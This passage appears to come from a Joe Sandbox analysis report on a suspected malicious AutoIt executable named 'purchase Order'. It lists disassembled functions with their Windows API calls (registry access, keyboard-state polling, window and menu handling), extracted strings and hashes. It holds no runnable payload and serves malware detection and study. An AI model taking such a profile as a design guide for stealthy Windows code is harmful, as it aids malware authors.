                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: LoadString__swprintf_wprintf
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 2889450990-3420473620
                                                        • Opcode ID: 3352a93b6d16dc30c6b24fedc6d9b1bdd9b781dbbd9dfcffac51bf9fa9ca1172
                                                        • Instruction ID: 57a4c7242f3d38b5ffec1225dcb7f4ae3da873b0a9dc4e792095535e2eed0a08
                                                        • Opcode Fuzzy Hash: 3352a93b6d16dc30c6b24fedc6d9b1bdd9b781dbbd9dfcffac51bf9fa9ca1172
                                                        • Instruction Fuzzy Hash: FF516B32900649BBCB15FBA0CD86EEEB778BF04344F104065F506721A2EB716F59EB61
                                                        APIs
                                                        • timeGetTime.WINMM ref: 00C87794
                                                          • Part of subcall function 00C5DC38: timeGetTime.WINMM(?,753DB400,00CB58AB), ref: 00C5DC3C
                                                        • Sleep.KERNEL32(0000000A), ref: 00C877C0
                                                        • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00C877E4
                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00C87806
                                                        • SetActiveWindow.USER32 ref: 00C87825
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C87833
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C87852
                                                        • Sleep.KERNEL32(000000FA), ref: 00C8785D
                                                        • IsWindow.USER32 ref: 00C87869
                                                        • EndDialog.USER32(00000000), ref: 00C8787A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: @U=u$BUTTON
                                                        • API String ID: 1194449130-2582809321
                                                        • Opcode ID: 0597755db579116a812462902107f479b0dc5042a56ae5e680770a01f7a3e943
                                                        • Instruction ID: bdad2a0f253409584af95c6f0f15e0ed5dafb3690b89faca469b775220cbeb65
                                                        • Opcode Fuzzy Hash: 0597755db579116a812462902107f479b0dc5042a56ae5e680770a01f7a3e943
                                                        • Instruction Fuzzy Hash: BC2106B0204705AFE7056B60EC99F2E3F6DFB44349B240234F51AD22A2EB719D55DB29
                                                        APIs
                                                        • _memset.LIBCMT ref: 00C855D7
                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00C85664
                                                        • GetMenuItemCount.USER32(00D01708), ref: 00C856ED
                                                        • DeleteMenu.USER32(00D01708,00000005,00000000,000000F5,?,?), ref: 00C8577D
                                                        • DeleteMenu.USER32(00D01708,00000004,00000000), ref: 00C85785
                                                        • DeleteMenu.USER32(00D01708,00000006,00000000), ref: 00C8578D
                                                        • DeleteMenu.USER32(00D01708,00000003,00000000), ref: 00C85795
                                                        • GetMenuItemCount.USER32(00D01708), ref: 00C8579D
                                                        • SetMenuItemInfoW.USER32(00D01708,00000004,00000000,00000030), ref: 00C857D3
                                                        • GetCursorPos.USER32(?), ref: 00C857DD
                                                        • SetForegroundWindow.USER32(00000000), ref: 00C857E6
                                                        • TrackPopupMenuEx.USER32(00D01708,00000000,?,00000000,00000000,00000000), ref: 00C857F9
                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C85805
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                        • String ID:
                                                        • API String ID: 3993528054-0
                                                        • Opcode ID: 47dc6fc6838aa7f456f4c5fa3fe2f91dc176f9797167ad7f41bc7001b4274a42
                                                        • Instruction ID: aeb758c98a94132cded1da3ec3ba35ba47b223f66059d701b26fd5c0ebc63c91
                                                        • Opcode Fuzzy Hash: 47dc6fc6838aa7f456f4c5fa3fe2f91dc176f9797167ad7f41bc7001b4274a42
                                                        • Instruction Fuzzy Hash: CE710470640605BFEB25AF15CC49FAABF65FF0036CF244216F6296A2D0D7B06C10DB98
                                                        APIs
                                                        • _memset.LIBCMT ref: 00C7A1DC
                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C7A211
                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C7A22D
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C7A249
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C7A273
                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C7A29B
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C7A2A6
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C7A2AB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                        • API String ID: 1687751970-22481851
                                                        • Opcode ID: ed7511c95281e3d51d8f8124d021e206d86b3f863b162441cbb1909cd0a84a01
                                                        • Instruction ID: 8150b76caf6940b8ef7b31585b25c5fdcba4cbeb08f2d1aa747eb1cee3750771
                                                        • Opcode Fuzzy Hash: ed7511c95281e3d51d8f8124d021e206d86b3f863b162441cbb1909cd0a84a01
                                                        • Instruction Fuzzy Hash: 7641E576C10229ABDF21EBA4DC85EEEB7B8FF04340F004129E916B31A1EB709E05DB51
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CA2BB5,?,?), ref: 00CA3C1D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                        • API String ID: 3964851224-909552448
                                                        • Opcode ID: 5b0b9248550a8506c1b5d8cddef1fc7ea5a0de929c4bf62fa5342d6a952e8dd2
                                                        • Instruction ID: 4307bcd96a523ba64691ef794530276c3d01d15c88c9948268df35ab6546784c
                                                        • Opcode Fuzzy Hash: 5b0b9248550a8506c1b5d8cddef1fc7ea5a0de929c4bf62fa5342d6a952e8dd2
                                                        • Instruction Fuzzy Hash: 6A414F7452028A8BCF08EF14D861AEB3365BF12348F104855FCA55B292EB70EF4ADB61
                                                        APIs
                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00CAA259
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00CAA260
                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00CAA273
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00CAA27B
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CAA286
                                                        • DeleteDC.GDI32(00000000), ref: 00CAA28F
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00CAA299
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00CAA2AD
                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00CAA2B9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                        • String ID: @U=u$static
                                                        • API String ID: 2559357485-3553413495
                                                        • Opcode ID: f908eafd97bf315f7150793ec6572790432e6d446c435f97389805c4ce414a87
                                                        • Instruction ID: 5abb57c3312b173ea6fc7943203edef0a14d1c369908840291f79f18c21d632b
                                                        • Opcode Fuzzy Hash: f908eafd97bf315f7150793ec6572790432e6d446c435f97389805c4ce414a87
                                                        • Instruction Fuzzy Hash: DE316131100216BBDF119F64DC49FEE3B69FF0A364F110324FA2AA61A0C735D821DBA5
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00CB36F4,00000010,?,Bad directive syntax error,00CDDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C825D6
                                                        • LoadStringW.USER32(00000000,?,00CB36F4,00000010), ref: 00C825DD
                                                        • _wprintf.LIBCMT ref: 00C82610
                                                        • __swprintf.LIBCMT ref: 00C82632
                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C826A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                        • API String ID: 1080873982-4153970271
                                                        • Opcode ID: c9b0e8a3ca4c12cd58f67b6ffbf9b4d493b006807be9cf28c7182e20a15d992f
                                                        • Instruction ID: feb0794f6c161fa58c52e6659c2b9080791dc346af7c8dbae2d8999c173ecff0
                                                        • Opcode Fuzzy Hash: c9b0e8a3ca4c12cd58f67b6ffbf9b4d493b006807be9cf28c7182e20a15d992f
                                                        • Instruction Fuzzy Hash: 08212B3190025EBFCF11BB90CC4AFEE7B79BF18308F044465F616660A3EA71A619EB51
                                                        APIs
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C87B42
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C87B58
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C87B69
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C87B7B
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C87B8C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: SendString
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 890592661-1007645807
                                                        • Opcode ID: 0a4a6928616559debed7a87481f5537d5211173a86b2257411521a8d9d1cd5b3
                                                        • Instruction ID: 035af1fd97a8494420651b3c6d6029d64e005a381627526abf47f0c1d87d8a25
                                                        • Opcode Fuzzy Hash: 0a4a6928616559debed7a87481f5537d5211173a86b2257411521a8d9d1cd5b3
                                                        • Instruction Fuzzy Hash: 4C11C4A06402AD7AD760B361CC8ADFFBA7CEB91B00F10052AB511A20D1EA705A49C6B1
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 00C5B496
                                                        • SetTextColor.GDI32(?,000000FF), ref: 00C5B4A0
                                                        • SetBkMode.GDI32(?,00000001), ref: 00C5B4B5
                                                        • GetStockObject.GDI32(00000005), ref: 00C5B4BD
                                                        • GetClientRect.USER32(?), ref: 00CBDD63
                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00CBDD7A
                                                        • GetWindowDC.USER32(?), ref: 00CBDD86
                                                        • GetPixel.GDI32(00000000,?,?), ref: 00CBDD95
                                                        • ReleaseDC.USER32(?,00000000), ref: 00CBDDA7
                                                        • GetSysColor.USER32(00000005), ref: 00CBDDC5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                        • String ID: @U=u
                                                        • API String ID: 3430376129-2594219639
                                                        • Opcode ID: 657f48a06a82372926139f879f9b7decf5edcd486f52040af1a470bbd89e22e0
                                                        • Instruction ID: 701415b9434545c0e97c27493415a129a21e3335d42edc55fd95097d20c6fc38
                                                        • Opcode Fuzzy Hash: 657f48a06a82372926139f879f9b7decf5edcd486f52040af1a470bbd89e22e0
                                                        • Instruction Fuzzy Hash: AE114975500205AFDB216BB4EC08FED7FA1EB05326F148675FA67A50E2DB314A82DB21
                                                        APIs
                                                          • Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
                                                          • Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF
                                                        • CoInitialize.OLE32(00000000), ref: 00C9034B
                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C903DE
                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00C903F2
                                                        • CoCreateInstance.OLE32(00CCDA8C,00000000,00000001,00CF3CF8,?), ref: 00C9043E
                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C904AD
                                                        • CoTaskMemFree.OLE32(?,?), ref: 00C90505
                                                        • _memset.LIBCMT ref: 00C90542
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00C9057E
                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C905A1
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00C905A8
                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C905DF
                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 00C905E1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                        • String ID:
                                                        • API String ID: 1246142700-0
                                                        • Opcode ID: ffe3d455a4c609bb630fc389e88925cccf667e0f222e3eca6be34b376c0ae9ae
                                                        • Instruction ID: e7157d14b164c3600c50d516b497be2d60f0afd95eac4d8c936592198a3c0a50
                                                        • Opcode Fuzzy Hash: ffe3d455a4c609bb630fc389e88925cccf667e0f222e3eca6be34b376c0ae9ae
                                                        • Instruction Fuzzy Hash: F0B1FC75A00108AFDB14DFA4C888EAEBBB9FF48304B158469F916EB261D770EE41DF54
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00C82ED6
                                                        • SetKeyboardState.USER32(?), ref: 00C82F41
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00C82F61
                                                        • GetKeyState.USER32(000000A0), ref: 00C82F78
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00C82FA7
                                                        • GetKeyState.USER32(000000A1), ref: 00C82FB8
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00C82FE4
                                                        • GetKeyState.USER32(00000011), ref: 00C82FF2
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00C8301B
                                                        • GetKeyState.USER32(00000012), ref: 00C83029
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00C83052
                                                        • GetKeyState.USER32(0000005B), ref: 00C83060
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: 2eef0013eeecf1fabc96b10773c81220a0999c0e8d57003dbe38239b968cb3ce
                                                        • Instruction ID: 1fbdc2e2128ae3136db20a8466dd89c238c88a15a26aaab22c333c5cb99dd230
                                                        • Opcode Fuzzy Hash: 2eef0013eeecf1fabc96b10773c81220a0999c0e8d57003dbe38239b968cb3ce
                                                        • Instruction Fuzzy Hash: ED51F570A087D829FB35FBA488047EEBBF45F11748F08459EC5D25A1C2DB549B8CC7AA
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 00C7ED1E
                                                        • GetWindowRect.USER32(00000000,?), ref: 00C7ED30
                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C7ED8E
                                                        • GetDlgItem.USER32(?,00000002), ref: 00C7ED99
                                                        • GetWindowRect.USER32(00000000,?), ref: 00C7EDAB
                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C7EE01
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00C7EE0F
                                                        • GetWindowRect.USER32(00000000,?), ref: 00C7EE20
                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C7EE63
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00C7EE71
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C7EE8E
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00C7EE9B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: e528252a202cf35b1a1ec33074ebddd405c366952eb0b6a8b3e49c3f3f409817
                                                        • Instruction ID: ea1d73e277afbcc02dc06eff44a1e91425e73c8ee59fb2b52942574379f8e2c1
                                                        • Opcode Fuzzy Hash: e528252a202cf35b1a1ec33074ebddd405c366952eb0b6a8b3e49c3f3f409817
                                                        • Instruction Fuzzy Hash: 1A510FB1B00205AFDB18CF69DD85FAEBBBAEB88701F148569F51AD7290D7709E00CB10
                                                        APIs
                                                          • Part of subcall function 00C5B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C5B759,?,00000000,?,?,?,?,00C5B72B,00000000,?), ref: 00C5BA58
                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C5B72B), ref: 00C5B7F6
                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00C5B72B,00000000,?,?,00C5B2EF,?,?), ref: 00C5B88D
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00CBD8A6
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C5B72B,00000000,?,?,00C5B2EF,?,?), ref: 00CBD8D7
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C5B72B,00000000,?,?,00C5B2EF,?,?), ref: 00CBD8EE
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C5B72B,00000000,?,?,00C5B2EF,?,?), ref: 00CBD90A
                                                        • DeleteObject.GDI32(00000000), ref: 00CBD91C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 641708696-0
                                                        • Opcode ID: 496bb245191aa2b16f96dd7f56b952f19ef28f4263dd0aa3254be7dc89ec776c
                                                        • Instruction ID: e0b31200f84369156a86c739c603728723257079f4c1f393e027f58a8759496a
                                                        • Opcode Fuzzy Hash: 496bb245191aa2b16f96dd7f56b952f19ef28f4263dd0aa3254be7dc89ec776c
                                                        • Instruction Fuzzy Hash: 0261AD38501700CFDB258F19DC88B69BBB5FB94312F14052DE85B87AA0CB71ADC4DBA8
                                                        APIs
                                                          • Part of subcall function 00C5B526: GetWindowLongW.USER32(?,000000EB), ref: 00C5B537
                                                        • GetSysColor.USER32(0000000F), ref: 00C5B438
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ColorLongWindow
                                                        • String ID:
                                                        • API String ID: 259745315-0
                                                        • Opcode ID: 150fb007b16010eec1e554d75c2948e299d294d56000e0e4dece848e692e0cc0
